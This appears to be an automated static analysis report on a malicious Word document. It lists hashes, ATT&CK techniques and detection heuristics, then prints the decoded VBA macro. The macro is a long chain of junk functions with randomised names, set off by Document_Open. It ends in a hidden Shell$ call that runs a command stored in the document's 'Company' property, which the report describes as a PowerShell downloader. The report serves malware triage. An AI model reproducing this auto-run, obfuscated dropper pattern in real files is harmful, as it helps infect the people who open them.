Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3442199a6adb335a…

MALICIOUS

Office (OLE)

207.5 KB Created: 2017-05-22 08:00:00 Authoring application: Microsoft Office Word First seen: 2017-05-29
MD5: 47685ddea86710c3d458f3e1337d0901 SHA-1: 0503c46bd92e6cf2e454c0d8220cad32b278f5a9 SHA-256: 3442199a6adb335a94a280cdebed451c46df3db871ca6e339180e9764dc22a14
232 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.001 PowerShell T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro that triggers on document open. This macro utilizes a Shell() call to execute PowerShell with bypass options, indicating an intent to download and execute a second-stage payload. The presence of the 'Doc.Dropper.Agent-6328746-0' ClamAV detection further supports its role as a dropper.

Heuristics 8

  • ClamAV: Doc.Dropper.Agent-6328746-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6328746-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Function uhqppacmie() As Object
Call Shell$(ActiveDocument.BuiltInDocumentProperties("COMpAnY").Value, 0)
End Function
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Option Explicit
Static Sub doCUMENt_Open(): Call jubblyqldu: End Sub
Static Function jubblyqldu() As Long
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND
    Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12592 bytes
SHA-256: a919210eb96e9a962136f9a59e696b3f11cf1a167187e2fcb76d54a4d5dafced
Detection
ClamAV: No threats found
Obfuscation or payload: likely
142 of 239 identifiers look randomly generated (e.g. 'hbjdnoiblw') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Static Sub doCUMENt_Open(): Call jubblyqldu: End Sub
Static Function jubblyqldu() As Long
Call knpuykrnzq
End Function
Sub knpuykrnzq()
Call owqxouljae
End Sub
Function owqxouljae() As Object
Call pbyqufggjl
End Function
Sub pbyqufggjl()
Call dmijdeegmm
End Sub
Private Sub dmijdeegmm()
Call iemqwmiiti
End Sub
Private Sub iemqwmiiti()
Call ypsdvjuhox
End Sub
Private Sub ypsdvjuhox()
Call oontzhmunf
End Sub
Static Sub oontzhmunf()
Call ywafkjxoqg
End Sub
Function ywafkjxoqg() As Single
Call inuaimdohd
End Function
Static Sub inuaimdohd()
Call lbexrxhrxr
End Sub
Function lbexrxhrxr() As Single
Call otmktgwtmz
End Function
Function otmktgwtmz() As Object
Call bifwvgfaea
End Function
Private Sub bifwvgfaea()
Call pzpfyfnzgw
End Sub
Private Function pzpfyfnzgw() As Double
Call fodlqclfqk
End Function
Static Sub fodlqclfqk()
Call dleegriqks
End Sub
Static Sub dleegriqks()
Call nyzjjuerdt
End Sub
Sub nyzjjuerdt()
Call fozgspoppp
End Sub
Static Sub fozgspoppp()
Call ifrwtzezud
End Sub
Private Function ifrwtzezud() As Single
Call uwglhayyem
End Function
Sub uwglhayyem()
Call afcjnigtwo
End Sub
Private Function afcjnigtwo() As String
Call efwcqqfjii
End Function
Private Sub efwcqqfjii()
Call mnoulvbetx
End Sub
Static Function mnoulvbetx() As Currency
Call tjvombemif
End Function
Static Sub tjvombemif()
Call czymifkuqg
End Sub
Static Sub czymifkuqg()
Call doemcrapxc
End Sub
Sub doemcrapxc()
Call yzznhjpncr
End Sub
Function yzznhjpncr() As Date
Call azznvuaewy
End Function
Function azznvuaewy() As String
Call fmddtctgea
End Function
Private Function fmddtctgea() As Boolean
Call lazrtjlavw
End Function
Private Function lazrtjlavw() As Boolean
Call smzchpscwk
End Function
Static Sub smzchpscwk()
Call ihmysmahft
End Sub
Static Sub ihmysmahft()
Call kqtityfenu
End Sub
Sub kqtityfenu()
Call bojsntmqep
End Sub
Static Sub bojsntmqep()
Call vdnmkmmvzd
End Sub
Function vdnmkmmvzd() As Byte
Call gcsojobjol
End Function
Function gcsojobjol() As Double
Call diaqletzwn
End Function
Private Sub diaqletzwn()
Call zggokvdkyi
End Sub
Sub zggokvdkyi()
Call zlkkcijayx
End Sub
Static Function zlkkcijayx() As Double
Call fphrophwse
End Function
Static Sub fphrophwse()
Call zsslsjmhah
End Sub
Static Function zsslsjmhah() As Currency
Call zpoyxvxqmc
End Function
Static Function zpoyxvxqmc() As Currency
Call lxvdywwkhr
End Function
Private Function lxvdywwkhr() As Boolean
Call fuhhiprvrz
End Function
Sub fuhhiprvrz()
Call cfxdcfutob
End Sub
Private Sub cfxdcfutob()
Call hbjdnoiblw
End Sub
Private Sub hbjdnoiblw()
Call gkvsxbaybl
End Sub
Static Sub gkvsxbaybl()
Call unybuadsps
End Sub
Static Sub unybuadsps()
Call nurprutknu
End Sub
Function nurprutknu()
Call xptehyjrup
End Function
Static Function xptehyjrup() As Variant
Call ibjdbztsfe
End Function
Function ibjdbztsfe() As Currency
Call lxajwjtbjm
End Function
Function lxajwjtbjm() As Date
Call hlyxjahfwn
End Function
Private Function hlyxjahfwn() As Object
Call vgqafzalni
End Function
Private Function vgqafzalni() As Single
Call mjgatvrxdy
End Function
Private Function mjgatvrxdy() As Variant
Call kkpmbkzonf
End Function
Private Function kkpmbkzonf() As Integer
Call cvqtqfznah
End Function
Sub cvqtqfznah()
Call upykravscc
End Sub
Sub upykravscc()
Call gfwcecqzcq
End Sub
Private Sub gfwcecqzcq()
Call ratkkdvgby
End Sub
Private Sub ratkkdvgby()
Call givkbbizoa
End Sub
Static Sub givkbbizoa()
Call cbtpisgdaw
End Sub
Private Sub cbtpisgdaw()
Call atvrdhtovj
End Sub
Static Sub atvrdhtovj()
Call zigwhvvkkt
End Sub
Private Function zigwhvvkkt() As String
Call rxpxpqgqnt
End Function
Static Sub rxpxpqgqnt()
Call sqdqcchskp
End Sub
Static Sub sqdqcchskp()
Call wzetrlboke
End Sub
Private Function wzetrlboke() As Currency
Call qthejeksem
End Function
Function qthejeksem() As Variant
Call eesxsdjsho
End Function
Static Sub eesxsdjsho()
Call qhbmzexndi
End Sub
Sub qhbmzexndi()
Call hsgzyakmyw
End Sub
Static Function hsgzyakmyw() As Variant
Call pgxhofqgig
End Function
Private Sub pgxhofqgig()
Call gzoaobntag
End Sub
Function gzoaobntag() As Long
Call qqiwmestrc
End Function
Static Sub qqiwmestrc()
Call tdssuoxwhq
End Sub
Function tdssuoxwhq() As Long
Call wwbfxymywz
End Function
Private Sub wwbfxymywz()
Call jltrzyvfoa
End Sub
Private Function jltrzyvfoa() As Long
Call ycdbcwdeqw
End Function
Function ycdbcwdeqw() As Date
Call nrrhuubkbj
End Function
Static Sub nrrhuubkbj()
Call loszjjyuus
End Sub
Private Sub loszjjyuus()
Call oqjwytidyv
End Sub
Static Function oqjwytidyv() As Boolean
Call oqnbwgetzp
End Function
Function oqnbwgetzp()
Call jxajiyikpe
End Function
Private Sub jxajiyikpe()
Call czuhlsodol
End Sub
Sub czuhlsodol()
Call iiqeqzwyhn
End Sub
Private Function iiqeqzwyhn() As Date
Call milyuivoti
End Function
Private Function milyuivoti() As Byte
Call uqcppnridx
End Function
Static Function uqcppnridx() As Integer
Call bmjkqtuqsf
End Function
Private Sub bmjkqtuqsf()
Call driaxeoglh
End Sub
Sub driaxeoglh()
Call lrshgjquhc
End Sub
Static Function lrshgjquhc() As Currency
Call gbojlbfsmq
End Function
Private Sub gbojlbfsmq()
Call icnizmqigy
End Sub
Static Function icnizmqigy() As Boolean
Call genribxszb
End Function
Private Sub genribxszb()
Call tdnnwbbfgw
End Sub
Private Sub tdnnwbbfgw()
Call bpnxlgihgk
End Sub
Static Function bpnxlgihgk()
Call qjauweqmps
End Function
Private Sub qjauweqmps()
Call sthdwpvjxu
End Sub
Sub sthdwpvjxu()
Call jrxnqlcvpp
End Sub
Static Function jrxnqlcvpp() As String
Call dgbioebakd
End Function
Sub dgbioebakd()
Call hubbynfvjm
End Sub
Sub hubbynfvjm()
Call mlolovjegn
End Sub
Private Sub mlolovjegn()
Call hivkonspii
End Sub
Private Function hivkonspii() As Single
Call hoyggazfjx
End Function
Static Sub hoyggazfjx()
Call ghredoling
End Sub
Private Sub ghredoling()
Call hvghvaclkh
End Sub
Static Function hvghvaclkh()
Call hrctbnnvwc
End Function
Static Sub hrctbnnvwc()
Call uzjzcompsr
End Sub
Private Sub uzjzcompsr()
Call nxvdmhhabz
End Sub
Sub nxvdmhhabz()
Call khlygxkyza
End Sub
Private Function khlygxkyza()
Call pdxyrfygvw
End Function
Sub pdxyrfygvw()
Call onjobtqdlk
End Sub
Private Sub onjobtqdlk()
Call cpmxystxar
End Sub
Private Sub cpmxystxar()
Call wwfluljoxt
End Sub
Function wwfluljoxt() As Byte
Call fshzlpzwep
End Function
Sub fshzlpzwep()
Call rexyeqjwpd
End Sub
Sub rexyeqjwpd()
Call taoezbjftl
End Sub
Function taoezbjftl() As Long
Call jeilyzlrro
End Function
Private Function jeilyzlrro() As Double
Call djfvjrqqyi
End Function
Private Sub djfvjrqqyi()
Call vmuwxnhbox
End Sub
Static Function vmuwxnhbox() As Date
Call sndhfcptxf
End Function
Private Function sndhfcptxf() As Byte
Call lyeouxprkg
End Function
Static Sub lyeouxprkg()
Call dsmfvslwmc
End Sub
Static Sub dsmfvslwmc()
Call hxfpsaulxr
End Sub
Sub hxfpsaulxr()
Call sscyzczswa
End Sub
Sub sscyzczswa()
Call okjgetydza
End Sub
Private Sub okjgetydza()
Call kehklkwhlv
End Sub
Private Function kehklkwhlv()
Call blfesgxaqk
End Function
Static Function blfesgxaqk() As Boolean
Call iluslnkovs
End Function
Private Function iluslnkovs() As Date
Call tpzkepkbiv
End Function
Sub tpzkepkbiv()
Call asrlfuxxup
End Sub
Static Sub asrlfuxxup()
Call ectovdrtud
End Sub
Private Sub ectovdrtud()
Call yvwzmwaxom
End Sub
Function yvwzmwaxom() As Boolean
Call mhgswvzxrn
End Function
Private Sub mhgswvzxrn()
Call szkzodcyyj
End Sub
Private Sub szkzodcyyj()
Call ikqmnzoyty
End Sub
Static Sub ikqmnzoyty()
Call xilcsxgksf
End Sub
Private Function xilcsxgksf()
Call hryodarevh
End Function
Sub hryodarevh()
Call ytwrpwixcc
End Sub
Function ytwrpwixcc() As Date
Call bggoygnarq
End Function
Sub bggoygnarq()
Call eypbaqccgz
End Sub
Sub eypbaqccgz()
Call lddfnwzqjb
End Sub
Static Sub lddfnwzqjb()
Call gfrwgotiav
End Sub
Function gfrwgotiav() As Long
Call pjbujtfwwl
End Function
Static Function pjbujtfwwl() As Boolean
Call ngcnyicgpt
End Function
Private Function ngcnyicgpt() As Variant
Call wsxrclyhiu
End Function
Static Function wsxrclyhiu() As String
Call wtbxayuyjp
End Function
Static Function wtbxayuyjp() As Long
Call raofmqypze
End Function
Sub raofmqypze()
Call kbicokeiyl
End Sub
Function kbicokeiyl() As Integer
Call qkeaurmdrn
End Function
Static Sub qkeaurmdrn()
Call naulihzanj
End Sub
Function naulihzanj() As Object
Call ctqltfhnow
End Function
Static Sub ctqltfhnow()
Call joxftlkvcf
End Sub
Private Function joxftlkvcf() As Long
Call luwvbwekvh
End Function
Function luwvbwekvh() As Date
Call utgdkagzrc
End Function
Static Function utgdkagzrc() As Integer
Call oeceptvxxq
End Function
Private Sub oeceptvxxq()
Call juwwnluubz
End Sub
Function juwwnluubz() As Variant
Call phbmmtnwja
End Function
Static Function phbmmtnwja() As Date
Call bfbiatrkqv
End Function
Private Sub bfbiatrkqv()
Call jsbtoyylqj
End Sub
Private Function jsbtoyylqj() As Double
Call zmoqavfras
End Function
Private Function zmoqavfras() As Byte
Call awvzahlniu
End Function
Static Sub awvzahlniu()
Call ruljudszzo
End Sub
Private Function ruljudszzo() As Single
Call ujlsomyvtt
End Function
Static Function ujlsomyvtt() As Date
Call fiqunpojhb
End Function
Static Sub fiqunpojhb()
Call cozwpegzqd
End Sub
Sub cozwpegzqd()
Call ymfupvpkry
End Sub
Static Function ymfupvpkry() As Double
Call fcnyvbhthm
End Function
Function fcnyvbhthm() As Double
Call evgxsquwlv
End Function
Sub evgxsquwlv()
Call ejvalckzjw
End Sub
Private Function ejvalckzjw() As Byte
Call ffrmqpwjvr
End Function
Private Function ffrmqpwjvr() As Byte
Call rnyrrpvcqg
End Function
Private Function rnyrrpvcqg() As Byte
Call lljvbjpozo
End Function
Private Sub lljvbjpozo()
Call ivarvztlxp
End Sub
Function ivarvztlxp() As Byte
Call mrmrghhuul
End Function
Static Sub mrmrghhuul()
Call mbygrvyrkz
End Sub
Sub mbygrvyrkz()
Call ttxhzapsji
End Sub
Function ttxhzapsji()
Call tkudknrcwi
End Function
Static Function tkudknrcwi() As Integer
Call cgwsarhkde
End Function
Function cgwsarhkde() As Variant
Call hhhifzgryu
End Function
Static Sub hhhifzgryu()
Call rodxpdrtsa
End Sub
Static Function rodxpdrtsa() As Object
Call gsxdnatfpd
End Function
Static Function gsxdnatfpd()
Call umpgjamlhy
End Function
Static Function umpgjamlhy() As Date
Call sajomoppmm
End Function
Function sajomoppmm() As Long
Call qbsauexgwu
End Function
Function qbsauexgwu() As Variant
Call bbozufmmtx
End Function
Private Sub bbozufmmtx()
Call agbykttkkr
End Sub
Private Sub agbykttkkr()
Call eluiicczvg
End Sub
Static Function eluiicczvg() As Currency
Call qgrqoehgup
End Function
Private Sub qgrqoehgup()
Call fouqfcuyiq
End Sub
Static Sub fouqfcuyiq()
Call iswdblevjk
End Sub
Function iswdblevjk() As Byte
Call zzuxhhgnpz
End Function
Sub zzuxhhgnpz()
Call fzjkaotcth
End Sub
Function fzjkaotcth() As Long
Call qdnctqtpgk
End Function
Private Sub qdnctqtpgk()
Call yggevvflse
End Sub
Private Sub yggevvflse()
Call cqhhlfzhts
End Sub
Private Function cqhhlfzhts() As Double
Call wjkscyjlnb
End Function
Static Function wjkscyjlnb() As String
Call kvvllwhlpc
End Function
Static Sub kvvllwhlpc()
Call pnzsdekmwy
End Sub
Static Sub pnzsdekmwy()
Call gyffdbwmrn
End Sub
Private Sub gyffdbwmrn()
Call vxavhzpyqu
End Sub
Function vxavhzpyqu() As Byte
Call ffmgsbzstw
End Function
Private Function ffmgsbzstw() As Long
Call whlkfyrlar
End Function
Sub whlkfyrlar()
Call sjqyypkvbg
End Sub
Static Sub sjqyypkvbg()
Call cmetqrkqfo
End Sub
Private Sub cmetqrkqfo()
Call irsxdyieiq
End Sub
Static Function irsxdyieiq() As String
Call etgpvqcwzk
End Function
Static Function etgpvqcwzk() As Single
Call mxqnyunkua
End Function
Sub mxqnyunkua()
Call kurfnjkuoi
End Sub
Function kurfnjkuoi() As Date
Call ugmkrmgvgj
End Function
Private Function ugmkrmgvgj() As Single
Call uhqppacmie
End Function
Function uhqppacmie() As Object
Call Shell$(ActiveDocument.BuiltInDocumentProperties("COMpAnY").Value, 0)
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.